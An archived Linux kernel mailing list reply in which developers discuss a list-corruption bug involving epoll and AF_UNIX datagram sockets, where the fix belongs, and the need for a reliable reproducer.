Re: List corruption on epoll_ctl(EPOLL_CTL_DEL) an AF_UNIX socket

From: Rainer Weikusat
Date: Thu Oct 01 2015 - 06:35:20 EST


Jason Baron <jbaron@xxxxxxxxxx> writes:
> On 09/30/2015 01:54 AM, Mathias Krause wrote:
>> On 29 September 2015 at 21:09, Jason Baron <jbaron@xxxxxxxxxx> wrote:
>>> However, if we call connect on socket 's', to connect to a new socket 'o2', we
>>> drop the reference on the original socket 'o'. Thus, we can now close socket
>>> 'o' without unregistering from epoll. Then, when we either close the ep
>>> or unregister 'o', we end up with this list corruption. Thus, this is not a
>>> race per se, but can be triggered sequentially.
>>
>> Sounds profound, but the reproducers calls connect only once per
>> socket. So there is no "connect to a new socket", no?
>> But w/e, see below.
>
> Yes, but it can be reproduced this way too. It can also happen with a
> close() on the remote peer 'o', and a send to 'o' from 's', which the
> reproducer can do as pointed out Michal. The patch I sent deals with
> both cases.

As Michal also pointed out, there's a unix_dgram_disconnected routine
being called in both cases and insofar "deregistering" anything beyond
what unix_dgram_disconnected (and - insofar I can tell this -
unix_release_sock) already do is actually required, this would be the
obvious place to add it. A good step on the way to that would be to
write (and post) some test code which actually reproduces the problem in
a predictable way.
--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/